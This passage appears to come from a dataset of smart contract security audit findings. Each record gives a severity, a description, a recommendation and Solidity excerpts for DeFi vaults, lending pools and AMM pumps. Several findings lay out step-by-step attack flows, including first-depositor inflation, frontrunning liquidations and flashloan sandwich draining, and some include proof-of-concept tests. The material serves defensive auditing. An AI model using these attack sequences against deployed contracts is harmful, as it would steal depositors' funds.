address(this);\\n changePrank(msgSender);\\n amount = 999_999_999_999_999_999_999_999_999;\\n uint minTokenAmountOut = well.getRemoveLiquidityOneTokenOut(\\n amount,\\n mockTokens[1]\\n );\\n well.removeLiquidityOneToken(\\n amount,\\n mockTokens[1],\\n minTokenAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n\\n msgSender = 
address(12_345_678);\\n changePrank(msgSender);\\n\\n vm.warp(block.timestamp + 1);\\n amount = 1;\\n MockToken(address(mockTokens[0])).mint(msgSender, amount);\\n MockToken(address(mockTokens[0])).approve(address(well), amount);\\n uint amountOut = well.getSwapOut(mockTokens[0], mockTokens[1], amount);\\n\\n uint[] memory reserves = well.getReserves();\\n assertEq(reserves[1], 0);\\n\\n // we are calling `_update` with reserves of 0, this should fail\\n well.swapFrom(\\n mockTokens[0],\\n mockTokens[1],\\n amount,\\n amountOut,\\n msgSender,\\n block.timestamp\\n );\\n}\\n```\\nч```\\n/**\\n * @title GeoEmaAndCumSmaPump\\n * @author Publius\\n * @notice Stores a geometric EMA and cumulative geometric SMA for each reserve.\\n * @dev A Pump designed for use in Beanstalk with 2 tokens.\\n *\\n * This Pump has 3 main features:\\n * 1. Multi-block MEV resistence reserves\\n * 2. MEV-resistant Geometric EMA intended for instantaneous reserve queries\\n * 3. MEV-resistant Cumulative Geometric intended for SMA reserve queries\\n *\\n * Note: If an `update` call is made with a reserve of 0, the Geometric mean oracles will be set to 0.\\n * Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0.\\n */\\n```\\n -`LibLastReserveBytes::storeLastReserves` has no check for reserves being too largeчmediumчAfter every liquidity event & swap, the IPump::update()is called. To update the pump, theLibLastReserveBytes::storeLastReservesfunction is used. This packs the reserve data intobytes32` slots in storage. A slot is then broken down into the following components:\\n1 byte for reserves array length\\n5 bytes for `timestamp`\\n16 bytes for each reserve balance\\nThis adds to 22 bytes total, but the function also attempts to pack the second reserve balance in the `bytes32` object. 
This would mean the `bytes32` would need 38 bytes total:\\n`1(length) + 5(timestamp) + 16(reserve balance 1) + 16(reserve balance 2) = 38 bytes`\\nTo fit all this data into the `bytes32`, the function cuts off the last few bytes of the reserve balances using shift, as shown below.\\n```\\nsrc\\libraries\\LibLastReserveBytes.sol\\n uint8 n = uint8(reserves.length);\\n if (n == 1) {\\n assembly {\\n sstore(slot, or(or(shl(208, lastTimestamp), shl(248, n)), shl(104, shr(152, mload(add(reserves, 32))))))\\n }\\n return;\\n }\\n assembly {\\n sstore(\\n slot,\\n or(\\n or(shl(208, lastTimestamp), shl(248, n)),\\n or(shl(104, shr(152, mload(add(reserves, 32)))), shr(152, mload(add(reserves, 64))))\\n )\\n )\\n // slot := add(slot, 32)\\n }\\n```\\n\\nSo if the amount being stored is too large, the actual stored value will be different than what was expected to be stored.\\nOn the other hand, the `LibBytes.sol` does seem to have a check:\\n```\\nrequire(reserves[0] <= type(uint128).max, \"ByteStorage: too large\");\\n```\\n\\nThe `_setReserves` function calls this library after every reserve update in the well. 
So in practice, with the currently implemented wells & pumps, this check would cause a revert.\\nHowever, a well that is implemented without this check could additionally trigger the pumps to cut off reserve data, meaning prices would be incorrect.чWe recommend adding a check on the size of reserves in `LibLastReseveBytes`.\\nAdditionally, it is recommended to add comments to `LibLastReseveBytes` to inform users about the invariants of the system and how the max size of reserves should be equal to the max size of a `bytes16` and not a `uint256`.чWhile we assume users will be explicitly warned about malicious Wells and are unlikely to interact with invalid Wells, we assess the severity to be MEDIUM.\\nProof of Concept:\\n```\\nfunction testStoreAndReadTwo() public {\\n uint40 lastTimeStamp = 12345363;\\n bytes16[] memory reserves = new bytes16[](2);\\n reserves[0] = 0xffffffffffffffffffffffffffffffff; // This is too big!\\n reserves[1] = 0x11111111111111111111111100000000;\\n RESERVES_STORAGE_SLOT.storeLastReserves(lastTimeStamp, reserves);\\n (\\n uint8 n,\\n uint40 _lastTimeStamp,\\n bytes16[] memory _reserves\\n ) = RESERVES_STORAGE_SLOT.readLastReserves();\\n assertEq(2, n);\\n assertEq(lastTimeStamp, _lastTimeStamp);\\n assertEq(reserves[0], _reserves[0]); // This will fail\\n assertEq(reserves[1], _reserves[1]);\\n assertEq(reserves.length, _reserves.length);\\n}\\n```\\nч```\\nsrc\\libraries\\LibLastReserveBytes.sol\\n uint8 n = uint8(reserves.length);\\n if (n == 1) {\\n assembly {\\n sstore(slot, or(or(shl(208, lastTimestamp), shl(248, n)), shl(104, shr(152, mload(add(reserves, 32))))))\\n }\\n return;\\n }\\n assembly {\\n sstore(\\n slot,\\n or(\\n or(shl(208, lastTimestamp), shl(248, n)),\\n or(shl(104, shr(152, mload(add(reserves, 32)))), shr(152, mload(add(reserves, 64))))\\n )\\n )\\n // slot := add(slot, 32)\\n }\\n```\\n +name,severity,description,recommendation,impact,function +"On liquidation, if netPnLE36 <= 0, the premium paid by the liquidator 
is locked in the contract.",high,"When liquidating a position, the liquidator is required to pay premium to Lender, which is accumulated in sharingProfitTokenAmts together with Lender's profit and paid to Lender in `_shareProfitsAndRepayAllDebts()`.\\n```\\n (\\n netPnLE36,\\n lenderProfitUSDValueE36,\\n borrowTotalUSDValueE36,\\n positionOpenUSDValueE36,\\n sharingProfitTokenAmts ) = calcProfitInfo(_positionManager, _user, _posId);\\n // 2. add liquidation premium to the shared profit amounts\\n uint lenderLiquidatationPremiumBPS = IConfig(config).lenderLiquidatePremiumBPS();\\n for (uint i; i < sharingProfitTokenAmts.length; ) {\\n sharingProfitTokenAmts[i] +=\\n (pos.openTokenInfos[i].borrowAmt * lenderLiquidatationPremiumBPS) / BPS;\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nHowever, if netPnLE36 <= 0, `_shareProfitsAndRepayAllDebts()` will not pay any profit to Lender and the premium in sharingProfitTokenAmts will also not be paid to Lender, which means that the premium paid by the liquidator will be locked in the contract.\\n```\\n function _shareProfitsAndRepayAllDebts( address _positionManager, address _posOwner, uint _posId,\\n int _netPnLE36, uint[] memory _shareProfitAmts, address[] memory _tokens,\\n OpenTokenInfo[] memory _openTokenInfos\\n ) internal {\\n // 0. load states\\n address _lendingProxy = lendingProxy;\\n // 1. 
if net pnl is positive, share profits to lending proxy\\n if (_netPnLE36 > 0) {\\n for (uint i; i < _shareProfitAmts.length; ) {\\n if (_shareProfitAmts[i] > 0) {\\n ILendingProxy(_lendingProxy).shareProfit(_tokens[i], _shareProfitAmts[i]);\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n emit ProfitShared(_posOwner, _posId, _tokens, _shareProfitAmts);\\n }\\n```\\n\\nAlso, when the position is closed, the tokens in the contract will be sent to the caller, so the next person who closes the position will get the locked tokens.\\n```\\n underlyingAmts = new uint[](underlyingTokens.length);\\n for (uint i; i < underlyingTokens.length; ) {\\n underlyingAmts[i] = IERC20(underlyingTokens[i]).balanceOf(address(this));\\n if (underlyingAmts[i] < _params.minUnderlyingAmts[i]) {\\n revert TokenAmountLessThanExpected(\\n underlyingTokens[i],\\n underlyingAmts[i],\\n _params.minUnderlyingAmts[i]\\n );\\n }\\n _doRefund(underlyingTokens[i], underlyingAmts[i]);\\n unchecked {\\n ++i;\\n }\\n```\\n","Modify `shareProfitsAndRepayAllDebts()` as follows:\\n```\\n function _shareProfitsAndRepayAllDebts(\\n address _positionManager,\\n address _posOwner,\\n uint _posId,\\n int _netPnLE36,\\n uint[] memory _shareProfitAmts,\\n address[] memory _tokens,\\n OpenTokenInfo[] memory _openTokenInfos\\n ) internal {\\n // 0. load states\\n address _lendingProxy = lendingProxy;\\n // 1. if net pnl is positive, share profits to lending proxy\\n - if (_netPnLE36 > 0) {\\n for (uint i; i < _shareProfitAmts.length; ) {\\n if (_shareProfitAmts[i] > 0) {\\n ILendingProxy(_lendingProxy).shareProfit(_tokens[i], _shareProfitAmts[i]);\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n emit ProfitShared(_posOwner, _posId, _tokens, _shareProfitAmts);\\n - }\\n```\\n",,"```\\n (\\n netPnLE36,\\n lenderProfitUSDValueE36,\\n borrowTotalUSDValueE36,\\n positionOpenUSDValueE36,\\n sharingProfitTokenAmts ) = calcProfitInfo(_positionManager, _user, _posId);\\n // 2. 
add liquidation premium to the shared profit amounts\\n uint lenderLiquidatationPremiumBPS = IConfig(config).lenderLiquidatePremiumBPS();\\n for (uint i; i < sharingProfitTokenAmts.length; ) {\\n sharingProfitTokenAmts[i] +=\\n (pos.openTokenInfos[i].borrowAmt * lenderLiquidatationPremiumBPS) / BPS;\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n" +The liquidated person can make the liquidator lose premium by adding collateral in advance,high,"When the position with debtRatioE18 >= 1e18 or startLiqTimestamp ! = 0, the position can be liquidated. On liquidation, the liquidator needs to pay premium, but the profit is related to the position's health factor and deltaTime, and when discount == 0, the liquidator loses premium.\\n```\\n uint deltaTime;\\n // 1.1 check the amount of time since position is marked\\n if (pos.startLiqTimestamp > 0) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.startLiqTimestamp);\\n }\\n // 1.2 check the amount of time since position is past the deadline\\n if (block.timestamp > pos.positionDeadline) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.positionDeadline);\\n }\\n // 1.3 cap time-based discount, as configured\\n uint timeDiscountMultiplierE18 = Math.max(\\n IConfig(config).minLiquidateTimeDiscountMultiplierE18(),\\n ONE_E18 - deltaTime * IConfig(config).liquidateTimeDiscountGrowthRateE18()\\n );\\n // 2. calculate health-based discount factor\\n uint curHealthFactorE18 = (ONE_E18 * ONE_E18) /\\n getPositionDebtRatioE18(_positionManager, _user, _posId);\\n uint minDesiredHealthFactorE18 = IConfig(config).minDesiredHealthFactorE18s(strategy);\\n // 2.1 interpolate linear health discount factor (according to the diagram in documentation)\\n uint healthDiscountMultiplierE18 = ONE_E18;\\n if (curHealthFactorE18 < ONE_E18) {\\n healthDiscountMultiplierE18 = curHealthFactorE18 > minDesiredHealthFactorE18\\n ? 
((curHealthFactorE18 - minDesiredHealthFactorE18) * ONE_E18) /\\n (ONE_E18 - minDesiredHealthFactorE18)\\n : 0;\\n }\\n // 3. final liquidation discount = apply the two discount methods together\\n liquidationDiscountMultiplierE18 =\\n (timeDiscountMultiplierE18 * healthDiscountMultiplierE18) /\\n ONE_E18;\\n```\\n\\nConsider the following scenario.\\nAlice notices Bob's position with debtRatioE18 >= 1e18 and calls `liquidatePosition()` to liquidate.\\nBob observes Alice's transaction, frontruns a call `markLiquidationStatus()` to make startLiqTimestamp == block.timestamp, and calls `adjustExtraColls()` to bring the position back to the health state.\\nAlice's transaction is executed, and since the startLiqTimestamp of Bob's position.startLiqTimestamp ! = 0, it can be liquidated, but since discount = 0, Alice loses premium. This breaks the protocol's liquidation mechanism and causes the liquidator not to launch liquidation for fear of losing assets, which will lead to more bad debts","Consider having the liquidated person bear the premium, or at least have the liquidator use the minDiscount parameter to set the minimum acceptable discount.",,"```\\n uint deltaTime;\\n // 1.1 check the amount of time since position is marked\\n if (pos.startLiqTimestamp > 0) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.startLiqTimestamp);\\n }\\n // 1.2 check the amount of time since position is past the deadline\\n if (block.timestamp > pos.positionDeadline) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.positionDeadline);\\n }\\n // 1.3 cap time-based discount, as configured\\n uint timeDiscountMultiplierE18 = Math.max(\\n IConfig(config).minLiquidateTimeDiscountMultiplierE18(),\\n ONE_E18 - deltaTime * IConfig(config).liquidateTimeDiscountGrowthRateE18()\\n );\\n // 2. 
calculate health-based discount factor\\n uint curHealthFactorE18 = (ONE_E18 * ONE_E18) /\\n getPositionDebtRatioE18(_positionManager, _user, _posId);\\n uint minDesiredHealthFactorE18 = IConfig(config).minDesiredHealthFactorE18s(strategy);\\n // 2.1 interpolate linear health discount factor (according to the diagram in documentation)\\n uint healthDiscountMultiplierE18 = ONE_E18;\\n if (curHealthFactorE18 < ONE_E18) {\\n healthDiscountMultiplierE18 = curHealthFactorE18 > minDesiredHealthFactorE18\\n ? ((curHealthFactorE18 - minDesiredHealthFactorE18) * ONE_E18) /\\n (ONE_E18 - minDesiredHealthFactorE18)\\n : 0;\\n }\\n // 3. final liquidation discount = apply the two discount methods together\\n liquidationDiscountMultiplierE18 =\\n (timeDiscountMultiplierE18 * healthDiscountMultiplierE18) /\\n ONE_E18;\\n```\\n" +First depositor can steal asset tokens of others,high,"The first depositor can be front run by an attacker and as a result will lose a considerable part of the assets provided. When the pool has no share supply, in `_mintInternal()`, the amount of shares to be minted is equal to the assets provided. 
An attacker can abuse this situation and profit from the rounding-down operation when calculating the amount of shares if the supply is non-zero.\\n```\\n function _mintInternal(address _receiver, uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n uint _totalSupply = totalSupply();\\n if (_totalAsset == 0 || _totalSupply == 0) {\\n mintShares = _balanceIncreased + _totalAsset;\\n } else {\\n mintShares = (_balanceIncreased * _totalSupply) / _totalAsset;\\n }\\n if (mintShares == 0) {\\n revert ZeroAmount();\\n }\\n _mint(_receiver, mintShares);\\n }\\n```\\n\\nConsider the following scenario.\\nAlice wants to deposit 2M * 1e6 USDC to a pool.\\nBob observes Alice's transaction, frontruns to deposit 1 wei USDC to mint 1 wei share, and transfers 1 M * 1e6 USDC to the pool.\\nAlice's transaction is executed, since _totalAsset = 1M * 1e6 + 1 and totalSupply = 1, Alice receives 2M * 1e6 * 1 / (1M * 1e6 + 1) = 1 share.\\nThe pool now has 3M*1e6 +1 assets and distributed 2 shares. 
Bob profits 0.5 M and Alice loses 0.5 M USDC.","When _totalSupply == 0, send the first min liquidity LP tokens to the zero address to enable share dilution Another option is to use the ERC4626 implementation(https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC20/extensions/ERC4626.sol#L199C14-L208) from OZ.",,"```\\n function _mintInternal(address _receiver, uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n uint _totalSupply = totalSupply();\\n if (_totalAsset == 0 || _totalSupply == 0) {\\n mintShares = _balanceIncreased + _totalAsset;\\n } else {\\n mintShares = (_balanceIncreased * _totalSupply) / _totalAsset;\\n }\\n if (mintShares == 0) {\\n revert ZeroAmount();\\n }\\n _mint(_receiver, mintShares);\\n }\\n```\\n" +The attacker can use larger dust when opening a position to perform griefing attacks,high,"When opening a position, unused assets are sent to dustVault as dust, but since these dust are not subtracted from inputAmt, they are included in the calculation of positionOpenUSDValueE36, resulting in a small netPnLE36, which can be used by an attacker to perform a griefing attack.\\n```\\n uint inputTotalUSDValueE36;\\n for (uint i; i < openTokenInfos.length; ) {\\n inputTotalUSDValueE36 += openTokenInfos[i].inputAmt * tokenPriceE36s[i];\\n borrowTotalUSDValueE36 += openTokenInfos[i].borrowAmt * tokenPriceE36s[i];\\n unchecked {\\n ++i;\\n }\\n }\\n // 1.3 calculate net pnl (including strategy users & borrow profit)\\n positionOpenUSDValueE36 = inputTotalUSDValueE36 + borrowTotalUSDValueE36;\\n netPnLE36 = positionCurUSDValueE36.toInt256() - positionOpenUSDValueE36.toInt256();\\n```\\n",Consider subtracting dust from inputAmt when opening a position.,,```\\n uint inputTotalUSDValueE36;\\n for (uint i; 
i < openTokenInfos.length; ) {\\n inputTotalUSDValueE36 += openTokenInfos[i].inputAmt * tokenPriceE36s[i];\\n borrowTotalUSDValueE36 += openTokenInfos[i].borrowAmt * tokenPriceE36s[i];\\n unchecked {\\n ++i;\\n }\\n }\\n // 1.3 calculate net pnl (including strategy users & borrow profit)\\n positionOpenUSDValueE36 = inputTotalUSDValueE36 + borrowTotalUSDValueE36;\\n netPnLE36 = positionCurUSDValueE36.toInt256() - positionOpenUSDValueE36.toInt256();\\n```\\n +An attacker can increase liquidity to the position's UniswapNFT to prevent the position from being closed,high,"UniswapV3NPM allows the user to increase liquidity to any NFT.\\n```\\n function increaseLiquidity(IncreaseLiquidityParams calldata params)\\n external payable override checkDeadline(params.deadline)\\n returns (\\n uint128 liquidity, uint256 amount0, uint256 amount1)\\n {\\n Position storage position = _positions[params.tokenId];\\n PoolAddress.PoolKey memory poolKey = _poolIdToPoolKey[position.poolId];\\n IUniswapV3Pool pool;\\n (liquidity, amount0, amount1, pool) = addLiquidity(\\n```\\n\\nWhen closing a position, in `_redeemPosition()`, only the initial liquidity of the NFT will be decreased, and then the NFT will be burned.\\n```\\n function _redeemPosition(\\n address _user, uint _posId\\n ) internal override returns (address[] memory rewardTokens, uint[] memory rewardAmts) {\\n address _positionManager = positionManager;\\n uint128 collAmt = IUniswapV3PositionManager(_positionManager).getPositionCollAmt(_user, \\n _posId);\\n // 1. take lp & extra coll tokens from lending proxy\\n _takeAllCollTokens(_positionManager, _user, _posId, address(this));\\n UniV3ExtraPosInfo memory extraPosInfo = IUniswapV3PositionManager(_positionManager)\\n .getDecodedExtraPosInfo(_user, _posId);\\n address _uniswapV3NPM = uniswapV3NPM; // gas saving\\n // 2. 
remove underlying tokens from lp (internal remove in NPM)\\n IUniswapV3NPM(_uniswapV3NPM).decreaseLiquidity(\\n IUniswapV3NPM.DecreaseLiquidityParams({\\n tokenId: extraPosInfo.uniV3PositionId,liquidity: collAmt, amount0Min: 0,\\n amount1Min: 0,\\n deadline: block.timestamp\\n })\\n );\\n // rest of code\\n // 4. burn LP position\\n IUniswapV3NPM(_uniswapV3NPM).burn(extraPosInfo.uniV3PositionId);\\n }\\n```\\n\\nIf the liquidity of the NFT is not 0, burning will fail.\\n```\\n function burn(uint256 tokenId) external payable override isAuthorizedForToken(tokenId) {\\n Position storage position = _positions[tokenId];\\n require(position.liquidity == 0 && position.tokensOwed0 == 0 && position.tokensOwed1 == 0,'Not cleared');\\n delete _positions[tokenId];\\n _burn(tokenId);\\n }\\n```\\n\\nThis allows an attacker to add 1 wei liquidity to the position's NFT to prevent the position from being closed, and later when the position expires, the attacker can liquidate it.","Consider decreasing the actual liquidity(using uniswapV3NPM.positions to get it) of the NFT in `_redeemPosition()`, instead of the initial liquidity",,"```\\n function increaseLiquidity(IncreaseLiquidityParams calldata params)\\n external payable override checkDeadline(params.deadline)\\n returns (\\n uint128 liquidity, uint256 amount0, uint256 amount1)\\n {\\n Position storage position = _positions[params.tokenId];\\n PoolAddress.PoolKey memory poolKey = _poolIdToPoolKey[position.poolId];\\n IUniswapV3Pool pool;\\n (liquidity, amount0, amount1, pool) = addLiquidity(\\n```\\n" +SwapHelper.getCalldata should check whitelistedRouters[_router],medium,"`SwapHelper.getCalldata()` returns data for swap based on the input, and uses whitelistedRouters to limit the _router param. The issue here is that when `setWhitelistedRouters()` sets the _routers state to false, it does not reset the data in routerTypes and swapInfos, which results in the router still being available in `getCalldata()`. 
As a result, users can still swap with invalid router data.\\n```\\n for (uint i; i < _statuses.length; ) {\\n whitelistedRouters[_routers[i]] = _statuses[i];\\n if (_statuses[i]) {\\n routerTypes[_routers[i]] = _types[i];\\n emit SetRouterType(_routers[i], _types[i]);\\n }\\n emit SetWhitelistedRouter(_routers[i], _statuses[i]);\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n",Consider checking whitelistedRouters[_router] in SwapHelper.getCalldata(),,"```\\n for (uint i; i < _statuses.length; ) {\\n whitelistedRouters[_routers[i]] = _statuses[i];\\n if (_statuses[i]) {\\n routerTypes[_routers[i]] = _types[i];\\n emit SetRouterType(_routers[i], _types[i]);\\n }\\n emit SetWhitelistedRouter(_routers[i], _statuses[i]);\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n" +The swap when closing a position does not consider shareProfitAmts,medium,"When closing a position, token swap is performed to ensure that the closer can repay the debt, for example, when operation == EXACT_IN, tokens of borrowAmt are required to be excluded from the swap, and when operation == EXACT_OUT, tokens of borrowAmt are required to be swapped. The issue here is that the closer needs to pay not only the borrowAmt but also the shareProfitAmts, which causes the closure to fail when percentSwapE18 = 100% due to insufficient tokens. Although the closer can adjust the percentSwapE18 to make the closure successful, it greatly increases the complexity.\\n```\\n for (uint i; i < swapParams.length; ) {\\n // find excess amount after repay\\n uint swapAmt = swapParams[i].operation == SwapOperation.EXACT_IN\\n ? 
IERC20(swapParams[i].tokenIn).balanceOf(address(this)) - openTokenInfos[i].borrowAmt\\n : openTokenInfos[i].borrowAmt - IERC20(swapParams[i].tokenOut).balanceOf(address(this));\\n swapAmt = (swapAmt * swapParams[i].percentSwapE18) / ONE_E18\\n if (swapAmt == 0) {\\n revert SwapZeroAmount();\\n }\\n```\\n",Consider taking shareProfitAmts into account when calculating swapAmt,,```\\n for (uint i; i < swapParams.length; ) {\\n // find excess amount after repay\\n uint swapAmt = swapParams[i].operation == SwapOperation.EXACT_IN\\n ? IERC20(swapParams[i].tokenIn).balanceOf(address(this)) - openTokenInfos[i].borrowAmt\\n : openTokenInfos[i].borrowAmt - IERC20(swapParams[i].tokenOut).balanceOf(address(this));\\n swapAmt = (swapAmt * swapParams[i].percentSwapE18) / ONE_E18\\n if (swapAmt == 0) {\\n revert SwapZeroAmount();\\n }\\n```\\n +"The freeze mechanism reduces the borrowableAmount, which reduces Lender's yield",medium,"The contract has two freeze intervals, mintFreezeInterval and freezeBuckets.interval, the former to prevent users from making flash accesses and the latter to prevent borrowers from running out of funds. Both freeze intervals are applied when a user deposits, and due to the difference in unlocking time, it significantly reduces borrowableAmount and thus reduces Lender's yield.\\n```\\n function _mintInternal(address _receiver,uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n```\\n\\nConsider freezeBuckets.interval == mintFreezeInterval = 1 day, 100 ETH in the LendingPool, and borrowableAmount = 100 ETH. At day 0 + 1s, Alice deposits 50 ETH, borrowableAmount = 150 ETH**-** lockedAmount(50 ETH) = 100 ETH, the 50 ETH frozen in freezeBuckets will be unlocked on day 2, while unfreezeTime[alice] = day 1 + 1s. 
At day 1 + 1s, unfreezeTime[Alice] is reached, Alice can withdraw 50 ETH, borrowableAmount = 100 ETH - LockedAmount(50 ETH) = 50 ETH. If Bob wants to borrow the available funds in the Pool at this time, Bob can only borrow 50 ETH, while the available funds are actually 100 ETH, which will reduce Lender's yield by half. At day 2 + 1s, freezeBuckets is unfrozen and borrowableAmount = 100 ETH -LockedAmount(0 ETH) = 100 ETH.","Consider making mintFreezeInterval >= 2 * freezeBuckets.interval, which makes unfreezeTime greater than the unfreeze time of freezeBuckets.",,"```\\n function _mintInternal(address _receiver,uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n```\\n" +A malicious operator can drain the vault funds in one transaction,high,"The vault operator can swap tokens using the `trade()` function. They pass the following structure for each trade:\\n```\\n struct tradeInput { \\n address spendToken;\\n address receiveToken;\\n uint256 spendAmt;\\n uint256 receiveAmtMin;\\n address routerAddress;\\n uint256 pathIndex;\\n }\\n```\\n\\nNotably, receiveAmtMin is used to guarantee acceptable slippage. An operator can simply pass 0 to make sure the trade is executed. This allows an operator to steal all the funds in the vault by architecting a sandwich attack.\\nFlashloan a large amount of funds\\nSkew the token proportions in a pool which can be used for trading, by almost completely depleting the target token.\\nPerform the trade at >99% slippage\\nSell target tokens for source tokens on the manipulated pool, returning to the original ratio.\\nPay off the flashloan, and keep the tokens traded at 99% slippage. 
In fact, this attack can be done in one TX, different to most sandwich attacks.",The contract should enforce sensible slippage parameters.,,```\\n struct tradeInput { \\n address spendToken;\\n address receiveToken;\\n uint256 spendAmt;\\n uint256 receiveAmtMin;\\n address routerAddress;\\n uint256 pathIndex;\\n }\\n```\\n +A malicious operator can steal all user deposits,high,"In the Orbital architecture, each Vault user has a numerator which represents their share of the vault holdings. The denominator is by design the sum of all numerators of users, an invariant kept at deposits and withdrawals. For maximum precision, the denominator should be a very large value. Intuitively, numerators could be spread across different users without losing precision. The critical calculations occur in these lines in deposit():\\n```\\n if (D == 0) { //initial deposit\\n uint256 sumDenoms = 0; \\n for (uint256 i = 0; i < tkns.length; i++) {\\n sumDenoms += \\n AI.getAllowedTokenInfo(tkns[i]).initialDenominator;\\n }\\n require(sumDenoms > 0 && sumDenoms <= maxInitialDenominator, \\n ""invalid sumDenoms"");\\n deltaN = sumDenoms; //initial numerator and denominator are the \\n same, and are greater than any possible balance in the vault.\\n //this ensures precision in the vault's \\n balances. User Balance = (N*T)/D will have rounding errors always 1 \\n wei or less. \\n } else { \\n // deltaN = (amt * D)/T;\\n deltaN = Arithmetic.overflowResistantFraction(amt, D, T);\\n }\\n```\\n\\nIn the initial deposit, Vault sums all token initialDenominators to get the final denominator. It is assumed that the vault will never have this amount in total balances (each token denominator is worth around $100m dollars).\\nIn any other deposit, the deltaN (numerator) credited to the depositor is (denominator * deposit amount / existing balance). When denominator is huge, this calculation is highly precise. However, when denominator is 1, a serious issue oc**curs. 
If user's deposit amount is one wei smaller than existing balance, deltaN would be zero. This property has led to the well-known ERC4626 inflation attack, where an attacker donates (sends directly to the contract) an amount so that the following deposit is consumed without any shares given to the user. In fact, it is possible to reduce the denominator to 1 and resurrect that attack. The root cause is that the initial deposit denominator is not linear in the deposit amount. Consider the attack flow below, done by a malicious operator:\\nDeploy an ETH/BTC pool\\nFlash loan $100mm in ETH and BTC each\\nPerform an initial deposit of $100mm in ETH/BTC\\nFrom another account, deposit 1 wei ETH / BTC -> receive 1 deltaN\\nWithdraw 100% as operator, reducing denominator to 1.\\nPay off flash loan\\nWait for victim deposits\\nWhen a deposit arrives at the mempool, frontrun with a donation of an equivalent amount. The victim will not receive any shares (numerator).\\nAny future deposits can be front-run again. Any deposit of less than the current balance will be lost.","Consider checking that user's received deltaN is reasonable. Calculate the expected withdrawable value (deltaN / denominator * balance), and verify that it is close enough to the deposited amount.",,"```\\n if (D == 0) { //initial deposit\\n uint256 sumDenoms = 0; \\n for (uint256 i = 0; i < tkns.length; i++) {\\n sumDenoms += \\n AI.getAllowedTokenInfo(tkns[i]).initialDenominator;\\n }\\n require(sumDenoms > 0 && sumDenoms <= maxInitialDenominator, \\n ""invalid sumDenoms"");\\n deltaN = sumDenoms; //initial numerator and denominator are the \\n same, and are greater than any possible balance in the vault.\\n //this ensures precision in the vault's \\n balances. User Balance = (N*T)/D will have rounding errors always 1 wei or less. 
\\n } else { \\n // deltaN = (amt * D)/T;\\n deltaN = Arithmetic.overflowResistantFraction(amt, D, T);\\n }\\n```\\n" +Removing a trade path in router will cause serious data corruption,medium,"The RouterInfo represents a single UniV3-compatible router which supports a list of token paths. It uses the following data structures:\\n```\\n mapping(address => mapping(address => listInfo)) private allowedPairsMap;\\n pair[] private allowedPairsList;\\n```\\n\\n```\\n struct listInfo {\\n bool allowed;\\n uint256 listPosition;\\n }\\n struct pair {\\n address token0;\\n address token1;\\n uint256 numPathsAllowed;\\n }\\n```\\n\\nWhen an admin specifies a new path from token0 to token1, `_increasePairPaths()` is called.\\n```\\n function _increasePairPaths(address token0, address token1) private {\\n listInfo storage LI = allowedPairsMap[token0][token1];\\n if (!LI.allowed){\\n LI.allowed = true;\\n LI.listPosition = allowedPairsList.length;\\n allowedPairsList.push(pair(token0, token1, 0));\\n }\\n allowedPairsList[LI.listPosition].numPathsAllowed++;\\n }\\n```\\n\\nWhen a path is removed, the complementary function is called.\\n```\\n function _decreasePairPaths(address token0, address token1) private {\\n listInfo storage LI = allowedPairsMap[token0][token1];\\n require(LI.allowed, ""RouterInfo: pair not allowed"");\\n allowedPairsList[LI.listPosition].numPathsAllowed--;\\n if (allowedPairsList[LI.listPosition].numPathsAllowed == 0){\\n allowedPairsList[LI.listPosition] = \\n allowedPairsList[allowedPairsList.length - 1];\\n allowedPairsList.pop();\\n LI.allowed = false;\\n }\\n }\\n```\\n\\nWhen the last path is removed, the contract reuses the index of the removed pair, to store the last pair in the list. It then removes the last pair, having already copied it. The issue is that the corresponding listInfo structure is not updated, to keep track of index in the pairs list. 
Future usage of the last pair will use a wrong index, which at this moment, is over the array bounds. When a new pair will be created, it will share the index with the corrupted pair. This can cause a variety of serious issues. For example, it will not be possible to remove paths from the corrupted pair until a new pair is created, at which point the new pair will have a wrong numPathsAllowed as it is shared.","Update the listPosition member of the last pair in the list, before repositioning it.",,```\\n mapping(address => mapping(address => listInfo)) private allowedPairsMap;\\n pair[] private allowedPairsList;\\n```\\n +Attacker can DOS deposit transactions due to strict verifications,medium,"When users deposit funds to the Vault, it verifies that the proportion between the tokens inserted to the vault matches the current vault token balances.\\n```\\n uint256[] memory balances = vlt.balances();\\n //ensure deposits are in the same ratios as the vault's current balances\\n require(functions.ratiosMatch(balances, amts), ""ratios don't match"");\\n```\\n\\nThe essential part of the check is below:\\n```\\n for (uint256 i = 0; i < sourceRatios.length; i++) {\\n // if (targetRatios[i] != (targetRatios[greatestIndex] * \\n sourceRatios[i]) / greatest) {\\n if (targetRatios[i] != \\n Arithmetic.overflowResistantFraction(targetRatios[greatestIndex], sourceRatios[i], greatest)) {\\n return false;\\n }\\n }\\n```\\n\\nThe exact logic here is not important, but note that a small change in the balance of one of the vault tokens will affect the expected number of tokens that need to be inserted to maintain correct ratio. The exact amounts to be deposited are 